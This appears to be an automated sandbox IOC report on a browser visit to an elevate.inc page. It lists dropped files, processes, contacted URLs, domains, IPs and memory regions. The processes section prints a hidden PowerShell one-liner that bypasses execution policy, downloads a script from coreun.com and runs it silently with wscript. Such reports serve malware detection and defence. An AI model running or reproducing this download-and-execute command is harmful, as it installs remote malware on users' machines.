IOC Report
https://www.elevate.inc/our-story

loading gif

Files

File Path
Type
Category
Malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
ASCII text, with CRLF line terminators
dropped
malicious
\Device\ConDrv
ASCII text, with very long lines (408), with no line terminators, with escape sequences
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03kz4pbn.ozb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikl3xmel.5e4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lu3bddnz.sjp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgcu5kso.cl3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiepsaax.o25.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd1u4dcy.fkb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\48GU7GXXVQJ0NN187WU8.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5cedbb.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5F35H1XQIXVPAZEAEAJH.temp
data
dropped
Chrome Cache Entry: 217
JSON data
dropped
Chrome Cache Entry: 218
HTML document, Unicode text, UTF-8 text, with very long lines (4813)
downloaded
Chrome Cache Entry: 219
ASCII text, with very long lines (64646)
downloaded
Chrome Cache Entry: 220
PNG image data, 79 x 98, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 221
Web Open Font Format (Version 2), TrueType, length 48256, version 1.0
downloaded
Chrome Cache Entry: 222
HTML document, ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 223
JSON data
downloaded
Chrome Cache Entry: 224
HTML document, Unicode text, UTF-8 text, with very long lines (4639)
downloaded
Chrome Cache Entry: 225
Unicode text, UTF-8 text, with very long lines (23237), with no line terminators
downloaded
Chrome Cache Entry: 226
ASCII text, with very long lines (5359)
downloaded
Chrome Cache Entry: 227
HTML document, Unicode text, UTF-8 text, with very long lines (5738)
downloaded
Chrome Cache Entry: 228
RIFF (little-endian) data, Web/P image
downloaded
Chrome Cache Entry: 229
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 230
ASCII text, with very long lines (48827)
downloaded
Chrome Cache Entry: 231
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 232
JSON data
downloaded
Chrome Cache Entry: 233
JSON data
dropped
Chrome Cache Entry: 234
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 235
ASCII text, with very long lines (19250)
downloaded
Chrome Cache Entry: 236
ASCII text, with very long lines (48827)
downloaded
Chrome Cache Entry: 237
ASCII text, with very long lines (4898), with no line terminators
downloaded
Chrome Cache Entry: 238
PNG image data, 79 x 98, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 239
Unicode text, UTF-8 text, with very long lines (65446)
downloaded
Chrome Cache Entry: 240
HTML document, Unicode text, UTF-8 text
downloaded
Chrome Cache Entry: 241
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 242
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 243
ASCII text, with very long lines (65536), with no line terminators
downloaded
Chrome Cache Entry: 244
ASCII text, with very long lines (46978)
downloaded
Chrome Cache Entry: 245
RIFF (little-endian) data, Web/P image
dropped
Chrome Cache Entry: 246
ASCII text, with very long lines (65311)
downloaded
Chrome Cache Entry: 247
ASCII text, with very long lines (3997), with no line terminators
downloaded
Chrome Cache Entry: 248
HTML document, Unicode text, UTF-8 text, with very long lines (56508)
downloaded
Chrome Cache Entry: 249
HTML document, ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 250
ASCII text, with very long lines (2134)
downloaded
Chrome Cache Entry: 251
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 252
ASCII text, with very long lines (5359)
downloaded
Chrome Cache Entry: 253
ASCII text, with very long lines (542)
downloaded
Chrome Cache Entry: 254
HTML document, Unicode text, UTF-8 text, with very long lines (7101)
downloaded
Chrome Cache Entry: 255
ISO Media, AVIF Image
downloaded
Chrome Cache Entry: 256
ASCII text, with very long lines (8156), with no line terminators
downloaded
Chrome Cache Entry: 257
JSON data
downloaded
Chrome Cache Entry: 258
PNG image data, 1594 x 527, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 259
JSON data
downloaded
Chrome Cache Entry: 260
ASCII text
downloaded
Chrome Cache Entry: 261
HTML document, Unicode text, UTF-8 text, with very long lines (7440)
downloaded
Chrome Cache Entry: 262
Unicode text, UTF-8 text, with very long lines (65327)
downloaded
Chrome Cache Entry: 263
HTML document, Unicode text, UTF-8 text, with very long lines (5082)
downloaded
Chrome Cache Entry: 264
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 599x337, components 3
dropped
Chrome Cache Entry: 265
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 266
HTML document, Unicode text, UTF-8 text, with very long lines (4847)
downloaded
Chrome Cache Entry: 267
PNG image data, 81 x 16, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 268
ASCII text, with very long lines (2329), with no line terminators
downloaded
Chrome Cache Entry: 269
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x45, components 3
dropped
Chrome Cache Entry: 270
ASCII text, with very long lines (65451)
downloaded
Chrome Cache Entry: 271
ASCII text, with very long lines (1839)
downloaded
Chrome Cache Entry: 272
Unicode text, UTF-8 text, with very long lines (41326)
downloaded
Chrome Cache Entry: 273
HTML document, Unicode text, UTF-8 text, with very long lines (4789)
downloaded
Chrome Cache Entry: 274
JSON data
dropped
Chrome Cache Entry: 275
Unicode text, UTF-8 text, with very long lines (65524), with no line terminators
downloaded
Chrome Cache Entry: 276
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 277
Unicode text, UTF-8 text, with very long lines (14234)
downloaded
Chrome Cache Entry: 278
PNG image data, 2 x 2, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 279
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 280
ASCII text, with very long lines (1168)
downloaded
Chrome Cache Entry: 281
ASCII text, with very long lines (6079)
downloaded
Chrome Cache Entry: 282
ASCII text, with very long lines (64943)
downloaded
Chrome Cache Entry: 283
JSON data
dropped
Chrome Cache Entry: 284
PNG image data, 86 x 17, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 285
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 286
ASCII text, with very long lines (5722)
downloaded
Chrome Cache Entry: 287
ASCII text, with no line terminators
dropped
Chrome Cache Entry: 288
HTML document, Unicode text, UTF-8 text, with very long lines (4841)
downloaded
Chrome Cache Entry: 289
HTML document, ASCII text, with very long lines (815)
downloaded
Chrome Cache Entry: 290
Web Open Font Format (Version 2), TrueType, length 105204, version 768.67
downloaded
Chrome Cache Entry: 291
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 292
JSON data
dropped
Chrome Cache Entry: 293
ASCII text, with very long lines (4014), with no line terminators
downloaded
Chrome Cache Entry: 294
ASCII text, with very long lines (4947)
downloaded
Chrome Cache Entry: 295
Unicode text, UTF-8 text, with very long lines (65442), with CRLF line terminators
downloaded
Chrome Cache Entry: 296
PNG image data, 86 x 17, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 297
PNG image data, 81 x 16, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 298
HTML document, Unicode text, UTF-8 text, with very long lines (4597)
downloaded
Chrome Cache Entry: 299
PNG image data, 1594 x 527, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 300
ASCII text, with very long lines (41429), with no line terminators
downloaded
Chrome Cache Entry: 301
JSON data
downloaded
Chrome Cache Entry: 302
PNG image data, 2 x 2, 8-bit/color RGBA, non-interlaced
dropped
There are 91 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9471181850235486042,10300577009420113889,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/our-story"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.elevate.inc/our-story
malicious
https://reefe.com.au/ab/elevateinc/check/images/all.min.css
167.172.78.216
malicious
https://player.vimeo.com/api/player.js
unknown
https://stats.g.doubleclick.net/g/collect
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d85daacb0ee65e4fec540_62abedd69e2a1d6
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65aecfb3e0847f76c91dfc6a_icon_automation
unknown
https://www.elevate.inc/why-elevate
unknown
https://www.google.com/ccm/form-data
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b731c45525915bb03e424c_techtrends.avif
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b7313d006bab536cc76b2a_cuttime-p-500.a
unknown
https://cdn.mida.so/js/optimize.js?key=w6GQ23b4dMgP1RzEeKpkDq
unknown
https://px.ads.linkedin.com/collect?
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d8482ac5ec161a86d9_64baf362c1aaca0
unknown
https://www.youtube.com
unknown
https://fontawesome.com
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65937a3a0452f1b9e23ad838_logo12.webp
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/6658deb93c221c91b9b81914_Blog_HSA%20Limi
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a4d90c6f4fa42a028082_Blog_Lifestyle%
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b730d8c78b959ebd7db16b_hierarchy.avif
unknown
https://m.youtube.com
unknown
https://nuget.org/nuget.exe
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66d8804d98330a06f1ef82a5_659d85dad1c8ab2
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a502b2e15d63c792696b_Blog_Meet%20the
unknown
https://github.com/microsoft/clarity
unknown
https://www.google.com/pagead/form-data
unknown
https://www.prnewswire.com/news-releases/elevate-secures-20-million-in-growth-funding-led-by-fin-cap
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/658c4784e3cbbca0722a774f_elevate%20webcl
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659b8ebb458eb201f13c4352_64e63bb81dfe526
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://www.elevate.inc
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d7482ac5ec161a85c2_63628f1c59c33f5
unknown
https://contoso.com/Icon
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b0328612c05e43c82dd6e2_brian_strom.avi
unknown
https://www.prnewswire.com/news-releases/elevate-named-best-consumer-payments-platform-in-9th-annual
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a45b0c6f4fa42a021d33_Blog_HSA%202024
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/661e7364df55a3ca5a55b1a6_webinar-p-800.a
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a06d73be12b2d532277070_plan%20design.s
unknown
https://www.linkedin.com/in/bstrom/
unknown
https://github.com/Pester/Pester
unknown
https://twitter.com/elevatedotinc
unknown
https://www.elevate.inc/use-cases/benefit-platforms
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/css/elevate-redesign.shared.cb8a3df76.mi
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a448dc0d8cab37812f39_Blog_AI%20or%20
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/67de40df9813cb129fbf4dfb_FinTech_Breakth
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659b8ebb5c622aebe3793d51_64e63bcefea5157
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a06d6ff44cee5e20e97f3d_legacy%20to%20m
unknown
https://stats.g.doubleclick.net/g/collect?v=2&
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a4a6e629ce5250b9f21c_Blog_HSA%20Reve
unknown
https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
unknown
https://www.linkedin.com/company/elevatedotinc
unknown
https://www.prnewswire.com/news-releases/elevate-honored-with-2024-hr-tech-award-for-ai-innovations-
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b04547ec6be3ea7121084f_jim_lynch.avif
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/681b920cd2ae6f1cffac8ffd_UX-blog-tmb.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66e9a59f36e67c76ac83a5aa_Award_ebn.avif
unknown
https://techcrunch.com/2021/10/04/elevate-launches-its-approach-to-managing-pre-tax-benefits-with-12
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b730c6070493c28afc1d3b_overview.avif
unknown
http://www.hubspot.com
unknown
https://use.typekit.net
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/668818983df6b043c98dbb4b_Screenshot%2020
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65942bd9393c1cc052d8bdfb_form%20header%2
unknown
https://www.google.com/ccm/conversion
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/67bf45c6067d5f46c28dc39e_pr-newswire-log
unknown
https://js.hs-banner.com/v2
unknown
https://aka.ms/pscore6
unknown
https://www.benefitnews.com/news/elevate-is-making-it-so-that-employees-dont-have-to-choose-between-
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d7f9942d052cbde9dd_62ab8fff6676244
unknown
https://td.doubleclick.net/td/rul/
unknown
https://www.builtincolorado.com/2021/10/05/elevate-raises-12m-series-a-hsa-fsa-benefits-platform
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66731b3d77877bc42fd37b96_ClaimsProcess_3
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/65b7a3bce315fecbf36ef612_Elevate%20Open%
unknown
https://fontawesome.com/license/free
unknown
https://www.prnewswire.com/news-releases/benefits-platform-elevate-raises-28m-in-growth-funding-3017
unknown
https://www.elevate.inc/blog
unknown
https://js.hscollectedforms.net/collectedforms.js
unknown
https://www.prnewswire.com/news-releases/elevate-lands-more-top-flight-talent-as-several-employee-be
unknown
https://www.prnewswire.com/news-releases/elevate-and-visa-collaborate-on-push-to-debit-health-reimbu
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66993357317f46bb95f94c3f_DCAP_346x173.av
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/js/elevate-redesign.schunk.36b8fb4925617
unknown
https://cdn.prod.website-files.com/6537d1496ae55969d9298a91/6830f94bb1339e06239d3298_Screens_2025_v3
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84e639c50a31518316b0_64baf3d6c359f15
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/6601db41b81b36df5da13251_Blog_FSASpiral_
unknown
https://www.linkedin.com/in/cosgray/
unknown
https://player.vimeo.com/video/901646435?app_id=122963&referrer=https%3A%2F%2Fwww.elevate.inc%2F
162.159.128.61
https://cdn.prod.website-files.com/654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro-p-5
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d8756d3958917d9c6a_61e83a62bf43923
unknown
https://player.vimeo.com/NOTICE.txt
unknown
https://www.elevate.inc/use-cases/third-party-administrators
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d734ec4c1a87185071_61f964502425d56
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/659d84d64dab0e91b180b0a1_62d9e9960d2a19b
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/661e7870d9a003b80e58428e_claims.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/6841eb2c7f3d9f20528f6a15_operations_.png
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66e3279237aef04dc35516ef_benefitspro-p-8
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65a1a37503fb11c2a5e1fe59_Blog_A%20Better
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/661e7364df55a3ca5a55b1a6_webinar-p-500.a
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/66797575e7d89e6d6f8c815a_blog_automation
unknown
https://www.benefitspro.com/2022/06/24/education-empowers-employees-to-better-leverage-benefits-a-lo
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b7313d006bab536cc76b2a_cuttime.avif
unknown
https://cdn.prod.website-files.com/654105530b98111cede036db/65b10658f3e7ba1d16577ccd_amanda_richter.
unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.5/gsap.min.js
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.elevate.inc
unknown
malicious
jsdelivr.map.fastly.net
151.101.1.229
forms.hsforms.com
104.18.80.204
user.elevateaccounts.com
18.161.156.81
2captcha.com
172.67.68.114
js.hs-analytics.net
104.16.160.168
proxy-ssl-geo-2.webflow.com
34.202.203.47
api.mida.so
74.235.92.23
vmss-clarity-ingest-eus2-e.eastus2.cloudapp.azure.com
172.175.38.6
track.hubspot.com
104.16.118.116
fresnel.vimeocdn.com
34.120.202.204
forms.hscollectedforms.net
104.16.111.254
js.hs-scripts.com
104.16.141.209
cdnjs.cloudflare.com
104.17.24.14
www.google.com
142.251.116.99
js.hs-banner.com
172.64.147.16
lensflare.vimeo.com
34.120.15.67
arclight.vimeo.com
34.120.202.204
player.vimeo.com.cdn.cloudflare.net
162.159.128.61
c-msn-pme.trafficmanager.net
20.125.209.212
js.hsadspixel.net
104.17.128.172
ax-0001.ax-msedge.net
150.171.27.10
vimeo.com
162.159.138.60
s-part-0029.t-0009.t-msedge.net
13.107.246.57
cdn.embed.ly.cdn.cloudflare.net
104.16.90.50
d3e54v103j8qbb.cloudfront.net
108.138.176.85
vimeo.map.fastly.net
151.101.128.217
googleads.g.doubleclick.net
142.250.114.156
ln-0002.ln-msedge.net
150.171.22.12
api.hubapi.com
104.18.242.108
cdn.prod.website-files.com
104.18.161.117
challenges.cloudflare.com
104.18.95.41
reefe.com.au
167.172.78.216
td.doubleclick.net
142.251.116.155
a1916.dscg2.akamai.net
23.192.223.204
js.hscollectedforms.net
104.16.109.254
cdn.embedly.com
unknown
cdn.jsdelivr.net
unknown
i.vimeocdn.com
unknown
f.vimeocdn.com
unknown
c.clarity.ms
unknown
k.clarity.ms
unknown
www.clarity.ms
unknown
www.linkedin.com
unknown
px.ads.linkedin.com
unknown
cdn.mida.so
unknown
snap.licdn.com
unknown
player.vimeo.com
unknown
There are 38 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
192.168.2.16
unknown
unknown
malicious
108.138.176.85
d3e54v103j8qbb.cloudfront.net
United States
151.101.64.217
unknown
United States
104.18.160.117
unknown
United States
172.67.68.114
2captcha.com
United States
104.18.161.117
cdn.prod.website-files.com
United States
151.101.0.217
unknown
United States
162.159.138.60
vimeo.com
United States
104.16.118.116
track.hubspot.com
United States
20.125.209.212
c-msn-pme.trafficmanager.net
United States
167.172.78.216
reefe.com.au
United States
150.171.22.12
ln-0002.ln-msedge.net
United States
104.17.128.172
js.hsadspixel.net
United States
142.251.116.155
td.doubleclick.net
United States
104.18.80.204
forms.hsforms.com
United States
104.18.95.41
challenges.cloudflare.com
United States
104.18.242.108
api.hubapi.com
United States
104.16.141.209
js.hs-scripts.com
United States
162.159.128.61
player.vimeo.com.cdn.cloudflare.net
United States
142.250.114.156
googleads.g.doubleclick.net
United States
142.251.116.104
unknown
United States
104.19.175.188
unknown
United States
142.251.116.99
www.google.com
United States
104.18.94.41
unknown
United States
23.192.223.204
a1916.dscg2.akamai.net
United States
172.64.147.16
js.hs-banner.com
United States
104.16.160.168
js.hs-analytics.net
United States
151.101.128.217
vimeo.map.fastly.net
United States
104.16.90.50
cdn.embed.ly.cdn.cloudflare.net
United States
104.16.111.254
forms.hscollectedforms.net
United States
18.161.156.81
user.elevateaccounts.com
United States
34.202.203.47
proxy-ssl-geo-2.webflow.com
United States
151.101.1.229
jsdelivr.map.fastly.net
United States
104.17.24.14
cdnjs.cloudflare.com
United States
13.107.246.57
s-part-0029.t-0009.t-msedge.net
United States
74.235.92.23
api.mida.so
United States
172.175.38.6
vmss-clarity-ingest-eus2-e.eastus2.cloudapp.azure.com
United States
142.250.115.99
unknown
United States
34.120.202.204
fresnel.vimeocdn.com
United States
104.26.10.235
unknown
United States
34.120.15.67
lensflare.vimeo.com
United States
150.171.27.10
ax-0001.ax-msedge.net
United States
104.16.109.254
js.hscollectedforms.net
United States
There are 33 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1DC5621A000
heap
page read and write
15D88D00000
heap
page read and write
1DC7062C000
heap
page read and write
7FFF7B170000
trusted library allocation
page read and write
608CCFE000
stack
page read and write
15D893C0000
heap
page execute and read and write
7FFF7B530000
trusted library allocation
page read and write
7FFF7B540000
trusted library allocation
page read and write
15D8992C000
trusted library allocation
page read and write
7FFF7AF10000
trusted library allocation
page read and write
15D89866000
trusted library allocation
page read and write
15DA16E4000
heap
page read and write
7FFF7B510000
trusted library allocation
page read and write
7FFF7B8B1000
trusted library allocation
page read and write
7FFF7AD80000
trusted library allocation
page read and write
7FFF7B3D0000
trusted library allocation
page read and write
1DC56190000
heap
page read and write
7FFF7B8A0000
trusted library allocation
page read and write
1DC56212000
heap
page read and write
7FFF7B140000
trusted library allocation
page read and write
1DC7068D000
heap
page read and write
7FFF7B1C0000
trusted library allocation
page read and write
7FFF7B610000
trusted library allocation
page read and write
608C97F000
stack
page read and write
7FFF7ACE0000
trusted library allocation
page read and write
1DC5846C000
trusted library allocation
page read and write
7FFF7B1C0000
trusted library allocation
page read and write
2C8337E000
stack
page read and write
608CAF4000
stack
page read and write
7FFF7B3B0000
trusted library allocation
page read and write
7FFF7B91A000
trusted library allocation
page read and write
7FFF7B146000
trusted library allocation
page read and write
7FFF7B720000
trusted library allocation
page read and write
7FFF7B140000
trusted library allocation
page read and write
2C82EFB000
stack
page read and write
15DA1590000
heap
page execute and read and write
7FFF7B290000
trusted library allocation
page read and write
7FFF7B470000
trusted library allocation
page read and write
7FFF7AF65000
trusted library allocation
page read and write
7FFF7B730000
trusted library allocation
page read and write
7FFF7AFBC000
trusted library allocation
page execute and read and write
1DC58317000
trusted library allocation
page read and write
2C830F7000
stack
page read and write
7FFF7B3F0000
trusted library allocation
page read and write
7FFF7B570000
trusted library allocation
page read and write
15D88C50000
heap
page readonly
608C3B2000
stack
page read and write
7FFF7B450000
trusted library allocation
page read and write
7FFF7AF1B000
trusted library allocation
page read and write
7FFF7B130000
trusted library allocation
page read and write
7FFF7B11B000
trusted library allocation
page read and write
7FFF7B560000
trusted library allocation
page read and write
7FFF7AD2C000
trusted library allocation
page execute and read and write
15DA1685000
heap
page read and write
7FFF7AF20000
trusted library allocation
page read and write
1DC58281000
trusted library allocation
page read and write
7FFF7B8F0000
trusted library allocation
page read and write
1DC70303000
heap
page read and write
7FFF7B1A0000
trusted library allocation
page read and write
7FFF7B550000
trusted library allocation
page read and write
7FFF7B620000
trusted library allocation
page read and write
7FFF7B5F0000
trusted library allocation
page read and write
1DC7107A000
trusted library allocation
page read and write
7FFF7B6C0000
trusted library allocation
page read and write
7FFF7B330000
trusted library allocation
page read and write
7FFF7B333000
trusted library allocation
page read and write
7FFF7B3D0000
trusted library allocation
page read and write
608C9FE000
stack
page read and write
7FFF7B990000
trusted library allocation
page read and write
1DC58270000
heap
page execute and read and write
7FFF7B820000
trusted library allocation
page read and write
7FFF7B8C0000
trusted library allocation
page read and write
15D89200000
heap
page read and write
15DA16B2000
heap
page read and write
2C83ECE000
stack
page read and write
7FFF7B1B0000
trusted library allocation
page read and write
1DC705AF000
heap
page read and write
15DA162C000
heap
page read and write
7FFF7B5D0000
trusted library allocation
page read and write
7FFF7B96C000
trusted library allocation
page read and write
7FFF7B710000
trusted library allocation
page read and write
1DC682F6000
trusted library allocation
page read and write
1DC705A7000
heap
page read and write
15D8B0FC000
trusted library allocation
page read and write
2C82981000
stack
page read and write
15D892AA000
heap
page read and write
7FFF7B330000
trusted library allocation
page read and write
7FFF7B3E0000
trusted library allocation
page read and write
7FFF7B610000
trusted library allocation
page read and write
15D872E1000
heap
page read and write
7FFF7B830000
trusted library allocation
page execute and read and write
7FFF7B580000
trusted library allocation
page read and write
7FFF7B380000
trusted library allocation
page read and write
7FFF7B320000
trusted library allocation
page execute and read and write
1DC561D2000
heap
page read and write
7FFF7B6B0000
trusted library allocation
page read and write
2C83174000
stack
page read and write
7FFF7ACD0000
trusted library allocation
page read and write
7FFF7B8D1000
trusted library allocation
page read and write
2C83478000
stack
page read and write
7FFF7B490000
trusted library allocation
page read and write
7FFF7B365000
trusted library allocation
page read and write
1DC58220000
heap
page execute and read and write
1DC57D70000
heap
page read and write
7FFF7B790000
trusted library allocation
page read and write
7FFF7B420000
trusted library allocation
page read and write
7FFF7B185000
trusted library allocation
page read and write
1DC561DA000
heap
page read and write
1DC57BD0000
trusted library allocation
page read and write
7FFF7B630000
trusted library allocation
page execute and read and write
608C3FE000
stack
page read and write
7FFF7B3E0000
trusted library allocation
page read and write
7FFF7B520000
trusted library allocation
page read and write
7FFF7B300000
trusted library allocation
page read and write
7FFF7B5B0000
trusted library allocation
page read and write
7FFF7B480000
trusted library allocation
page read and write
7FFF7B3B0000
trusted library allocation
page read and write
15D89258000
heap
page read and write
1DC582C3000
trusted library allocation
page read and write
7FFF7AF03000
trusted library allocation
page execute and read and write
1DC583A9000
trusted library allocation
page read and write
1DC582EF000
trusted library allocation
page read and write
1DC561D8000
heap
page read and write
7FFF7B970000
trusted library allocation
page read and write
7FFF7B190000
trusted library allocation
page read and write
7FFF7B189000
trusted library allocation
page read and write
7FFF7B120000
trusted library allocation
page read and write
1DC70280000
heap
page read and write
1DC56270000
heap
page read and write
7FFF7B103000
trusted library allocation
page read and write
7FFF7B1D0000
trusted library allocation
page execute and read and write
7FFF7B5F0000
trusted library allocation
page read and write
7FFF7B630000
trusted library allocation
page read and write
1DC563A5000
heap
page read and write
7FFF7B460000
trusted library allocation
page read and write
15DA16AE000
heap
page read and write
1DC57C60000
heap
page read and write
7FFF7ACD4000
trusted library allocation
page read and write
1DC563B0000
heap
page read and write
7FFF7B7A0000
trusted library allocation
page execute and read and write
1DC57C00000
heap
page readonly
7FFF7B913000
trusted library allocation
page read and write
7FFF7B770000
trusted library allocation
page read and write
1DC7067E000
heap
page read and write
7FFF7B270000
trusted library allocation
page read and write
7FFF7B4B0000
trusted library allocation
page read and write
7FFF7B350000
trusted library allocation
page read and write
7FFF7B4A0000
trusted library allocation
page read and write
7FFF7B1F0000
trusted library allocation
page read and write
7FFF7B400000
trusted library allocation
page read and write
1DC70694000
heap
page read and write
7FFF7B700000
trusted library allocation
page read and write
7FFF7B4E0000
trusted library allocation
page read and write
1DC57C10000
trusted library allocation
page read and write
608C8FE000
stack
page read and write
1DC705A0000
heap
page read and write
1DC562A0000
heap
page read and write
